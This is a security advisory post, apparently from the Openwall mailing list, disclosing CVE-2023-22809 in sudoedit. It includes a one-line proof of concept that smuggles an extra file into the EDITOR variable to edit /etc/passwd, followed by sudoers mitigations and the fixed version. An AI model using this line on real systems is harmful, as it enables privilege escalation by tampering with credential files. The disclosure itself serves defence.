Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 19 Jan 2023 01:33:43 +0100
From: Matthieu Barjole <>
Subject: CVE-2023-22809: Sudoedit can edit arbitrary files

Hello everyone,

While auditing Sudo, Synacktiv identified a privilege escalation in sudoedit
when a user is authorized to use it by the sudoers policy. This
was assigned CVE-2023-22809 and affects Sudo versions 1.8.0 through 1.9.12p1

## Analysis

The technical analysis can be found in the following security advisory:

## Proof of Concept

Assuming the following sudoers policy:

# cat /etc/sudoers
user ALL=(ALL:ALL) sudoedit /etc/motd

Arbitrary files such as `/etc/passwd` may also be edited as such:

EDITOR='vim -- /etc/passwd' sudoedit /etc/motd

## Mitigation

It is possible to prevent a user-specified editor from being used by
sudoedit by
adding the following line to the sudoers file.

Defaults!sudoedit   env_delete+="SUDO_EDITOR VISUAL EDITOR"

To restrict the editor when editing specific files, a Cmnd_Alias can be
for example:

Cmnd_Alias          EDIT_MOTD = sudoedit /etc/motd
user                ALL = EDIT_MOTD

## Fix

The issue was fixed in Sudo 1.9.12.p2.

## References


Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.